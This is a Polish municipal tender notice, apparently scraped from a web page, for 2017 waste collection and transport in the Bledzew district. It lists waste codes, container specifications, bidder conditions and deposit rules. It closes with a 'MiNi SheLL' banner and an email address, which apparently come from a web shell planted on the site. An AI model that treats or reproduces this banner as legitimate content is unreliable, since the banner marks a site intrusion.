- około 0,01Mg odpadów w postaci opakowań po środkach ochrony roślin (20 01 80 inne niż wymienione w 20 01 19*),
- około 0,0005Mg odpadów w postaci przeterminowanych lekarstw (20 01 32 inne niż wymienione w 20 01 31*),
- około 0,01Mg farby, tusze drukarskie, kleje lepiszcze i żywice (20 01 28 inne niż wymienione w 20 01 27*)
- około 0,01Mg rozpuszczalniki (20 01 13*)

Mieszkańcy segregują również miesięcznie średnio w systemie workowym i za pomocą pojemników typ IGLO następującą ilość odpadów:
- biodegradowalne w tym odpady kuchenne - 20 01 08; 20 02, 01 w ilości 1,5Mg,
- szklane - 15 01 07 (w tym 20 01 02) w ilości 4,2Mg 
- z tworzyw sztucznych - 15 01 02 (w tym 20 01 39) w ilości 3,3Mg 
- z papieru i tektury - 15 01 01 (w tym 20 01 01) w ilości 0,9Mg 

Z powyższego wynika, że średnio każdego miesiąca na terenie gminy Bledzew powstanie  około 84,83Mg wszystkiego rodzaju odpadów, które podlegać będą odebraniu i  przetransportowaniu przez Wykonawcę do Instalacji w Długoszynie lub INNEKO w Gorzowie Wlkp.   

7) W trakcie trwania zamówienia przewiduje się wzrost lub zmniejszenie liczby gospodarstw domowych z których będą odbierane odpady o około 10%. W przypadku wystąpienia takich okoliczności Zamawiający powiadomi o tym Wykonawcę bez zbędnej zwłoki. Zwiększenie lub zmniejszenie liczby nieruchomości nie będzie miało wpływu na cenę usługi.

8) Rodzaje pojemników do gromadzenia odpadów zmieszanych: 120 l. 240 l. przystosowane do załadunku specjalistycznym sprzętem (śmieciarki bezpyłowe) 

Charakterystyka specjalistycznych pojemników do gromadzenia odpadów na terenach zabudowy wielorodzinnej - pojemność co najmniej 1100 litrów przystosowane do załadunku specjalistycznym sprzętem (śmieciarki bezpyłowe) 

9) Charakterystyka worków do selektywnej zbiórki odpadów na terenie zabudowy jednorodzinnej 
worki z folii polietylenowej o i grubości od 40 do 60 mikronów zapewniającej szczelność w kolorze:
- w kolorze niebieskim na papier i tekturę z nadrukiem papier o pojemności 80l,
- w kolorze żółtym na tworzywa sztuczne z nadrukiem plastik o pojemności 120l,
- w kolorze zielonym lub białym na opakowania szklane kolorowe lub bezbarwne z nadrukiem szkło o pojemności 80l,
- w kolorze brązowym na odpady biodegradalne z nadrukiem bio-odpady lub podobny o pojemności 80l

10) Charakterystyka pojemników  do selektywnej zbiórki odpadów na terenie zabudowy  wielorodzinnej: pojemniki typ  Iglo przeznaczone do rozładunku specjalistycznym sprzętem HDS.
- w kolorze niebieskim na papier i tekturę z nadrukiem papier o pojemności 1,5m3,
- w kolorze żółtym na tworzywa sztuczne z nadrukiem plastik o pojemności 1,5m3,,
- w kolorze zielonym na opakowania szklane kolorowe z nadrukiem szkło o pojemności 1,5m3,,
- w kolorze białym na bezbarwne opakowania szklane z nadrukiem szkło o pojemności 1,5m3,,

11) Na odpady biodegradowalne w kolorze brązowym z nadrukiem bio-odpady lub podobny o pojemności 240l 
4.6	Punkt Selektywnej Zbiórki Odpadów Komunalnych
W Bledzewie przy ul. Kościuszki 35, wjazd od ul. Nowej funkcjonuje PSZOK. Do punktu tego mieszkańcy gminy dostarczają odpady. W ramach umowy Wykonawca będzie odbierał z PSZOK następujące odpady:
- 16 01 03 zużyte opony,
- 20 01 10 odzież,
- 20 01 11 tekstylia,
- 20 01 21* lampy fluorescencyjne i inne odpady zawierające rtęć,
- 20 01 32  leki inne niż wymienione w 20 01 29
- 20 01 33* baterie i akumulatory
- 20 03 07 odpady wielkogabarytowe
Które należy dostarczać do zagospodarowania do Instalacji w Długoszynie.

W przypadku awarii instalacji w Długoszynie wskazane odpady należy dostarczyć do Instalacji w Kunowicach. Dostarczenie odpadów do Instalacji w Kunowicach jest możliwe tylko w przypadku wystąpienia awarii instalacji w Długoszynie.  

Odpady z grupy:
- 16 06 01* baterie i akumulatory ołowiowe,
- 16 06 02* baterie i akumulatory niklowo-kadmowe,
- 20 01 13* rozpuszczalniki,
- 20 01 25  oleje i tłuszce jadalne,
- 20 01 28  farby, tusze, farby drukarskie, oleje lepiszcze i żywice inne niż wymienione w 
  20 01 27,
- 20 01 80 środki ochrony roślin inne niż wymienione w 20 01 19,
należy dostarczyć do INNEKO w Gorzowie Wlkp.

Szacunkowa ilość powstających w PSZOK odpadów została określona w  pk 4.5. ust 6

Z punktu tego Wykonawca będzie odbierał odpady dwa razy w roku tj. w miesiącu  czerwcu i grudniu 2017 r. Odbiór odpadów Wykonawca zgłosi Zamawiającemu na 14 dniu przed dniem w którym zamierza odebrać odpady. Odbiór odpadów odbędzie się na zasadach określonych w pkt 5 ust 3. Wykonawca który będzie odbierał odpady z PSZOK musi mieć przeznaczony do tego odpowiedni sprzęt, środek transportu w tym umożliwiający załadunek odpadów wielkogabarytowych. Wszystkie odpady znajdują się w pomieszczeniach zadaszonych.<br /><br /><b>II.5) Główny kod CPV: </b>90511000-2<br /><b> Dodatkowe kody CPV:</b>90512000-9,
                90513100-7<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data rozpoczęcia: 02/01/2017
                    data zakończenia: 31/12/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że; 
a)	posiada wpis do rejestru działalności regulowanej prowadzonego przez Wójta Gminy Bledzew w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości zgodnie z wymogami ustawy z dnia 13.09.1996 r. o utrzymaniu czystości i porządku w gminie (Dz. U. z 2016 r. poz. 250);
b)	posiada aktualne zezwolenie na transport odpadów zgodnie z ustawą z dnia 14.12.2012 r. o odpadach (Dz. U. z 2013 r. poz. 122).<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że posiada opłaconą polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 150.000,00 zł. lub jej równowartość w walucie obcej.<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Warunki udziału w postępowaniu zostanie uznany za spełniony jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, wykonywał co najmniej jedną usługę odbioru odpadów komunalnych wykonaną na rzecz właścicieli nieruchomości w sposób ciągły przez okres minimum 12 miesięcy o łącznej masie minimum 1000 Mg/rok, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem dowodów określających czy usługi zostały wykonane lub są wykonywane należycie - zgodnie z załącznikiem Nr 5 do SIWZ. W celu wykazania spełnienia warunku dotyczącego potencjału technicznego, którego opis sposobu spełnienia został dokonany w ogłoszeniu o zamówieniu Zamawiającego żąda:
- Dysponowania specjalistycznym sprzętem w tym co najmniej 2 samochodami specjalistycznym  bezpylnym, o minimalnej kubaturze 10 m, minimum 2 samochodami skrzyniowymi, o ładowności minimalnej 3,5 Mg. oraz jednym specjalistycznym sprzętem (HDS) przystosowanym do rozładunku pojemników typ. Iglo przeznaczonych do gromadzenia odpadów segregowanych zgodnie z załącznikiem nr 6 do SIWZ.
- Dysponowania osobami (minimum 2), które będą wykonywać czynności bezpośrednio związane z realizacja zadania w tym przynajmniej 1 osoba posiadająca uprawnienia do kierowania sprzętem specjalistycznym. Zamawiający wymaga od Wykonawców wskazania w ofercie (Załącznik nr 6 do SIWZ) imion i nazwisk tych osób wraz z podaniem informacji o podstawie do dysponowania nimi oraz rodzajem ich zatrudnienia.<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"></div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1. Wykonawca, w terminie 3 dni od dnia zamieszczenia na stronie internetowej  Zamawiającego www.bip.bledzew.pl informacji, o której mowa w art. 86 ust. 5 przekazuje Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej  grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy Pzp. Wraz ze złożeniem oświadczenia, Wykonawca może przedstawić dowody, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia. Powyższe oświadczenie Wykonawca, który złożył ofertę- przekazuje Zamawiającemu bez wezwania. 
2. Wykonawcę, którego oferta zostanie najwyżej oceniona, Zamawiający wezwie do złożenia w terminie 5 dni aktualnych na dzień złożenia dokumentów potwierdzających spełnienie warunków udziału w postępowaniu tj.
1)Wykaz wykonanych usług  załącznik nr 5 do SIWZ
2)6.Wykaz narzędzi i urządzeń technicznych oraz osób dostępnych Wykonawcy  załącznik nr 6 do SIWZ
3)Wpis do rejestru działalności regulowanej prowadzonego przez Wójta Gminy Bledzew w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości.
4)Aktualne zezwolenie na transport odpadów.
5)Opłaconą polisę lub inny dokument ubezpieczenia.<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1. Formularz ofertowy  załącznik nr 1 do SIWZ
2. Oświadczenie Wykonawcy, dot. przesłanek wykluczenia z postępowania, składane na podstawie art. 25a ust. 1 ustawy Pzp  załącznik nr 2 do SIWZ
3. Oświadczenie Wykonawcy dot. spełniania warunków udziału w postępowaniu, składane na podstawie art. 25a ust. 1 ustawy Pzp  załącznik nr 3 do SIWZ
4. Pełnomocnictwo lub inny dokument określający zakres umocowania do reprezentowania Wykonawcy, o ile ofertę składa pełnomocnik Wykonawcy.
5 Pisemne zobowiązanie, o ile Wykonawca polega na zasobach innych podmiotów- jeśli dotyczy (Pisemne zobowiązanie powinno być złożone w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę (jeśli posiada oryginał) lub podmiot trzeci)
6. Dowód wniesienia wadium.
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />27.1	Oferta musi być zabezpieczona wadium w wysokości 4 000,00 PLN, (słownie: cztery tysiące i 00/100 złotych)
27.2	Wnosząc lub wpłacając wadium przetargowe należy je oznaczyć tytułem Wadium w przetargu nieograniczonym usuwanie i transport odpadów.
27.3	Nie wniesienie wadium w wymaganym terminie oraz wymaganej wysokości i formie skutkuje wykluczeniem Wykonawcy z postępowania.
27.4	Wykonawca wnosi wadium w jednej z poniżej podanych form:
a)	pieniądzu na konto Urzędu Gminy Bledzew rachunek nr 978367 0000 0030 1208 6000 0002
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c)	gwarancjach bankowych;
d)	gwarancjach ubezpieczeniowych;
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U z 2007 r Nr 42, poz. 275 ze zm).
27.5	Wadium wniesione w pieniądzu musi być potwierdzone w ofercie kserokopią wpłaty.
27.6	O uznaniu przez Zamawiającego, że wadium w pieniądzu wpłacono w wymaganym terminie, decyduje data wpływu środków na rachunek Zamawiającego.
27.7	Wadium wniesione w formie ustalonej w pkt 4 b) do 4 e) musi być zdeponowane w oryginale w kasie Zamawiającego  przed terminem składania ofert (pokój nr 11), a potwierdzoną za zgodność z oryginałem kserokopię należy dołączyć do oferty.
27.8	Wadium dla grupy Wykonawców występujących wspólnie (konsorcjum) może być wniesione przez jednego z uczestników konsorcjum.
27.9	Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza.
27.10	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
27.11	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 Pzp, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
27.12	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
1)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
27.13	W zakresie wadium obowiązują uregulowania zawarte w art. 45 i 46 Pzp.
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  tak
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Kryterium środowiskowe</td><td>30</td></tr><tr><td>Termin płatności</td><td>10</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zamawiający przewiduje możliwość dokonania zmiany umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy. Ewentualna zmiana może być spowodowana dostosowaniem zamówienia do wymogów prawnych związanych z planowanym wejściem w życie ustawy o zmianie ustawy o utrzymaniu czystości i porządku w gminach.<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 18/11/2016, godzina: 8:15,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com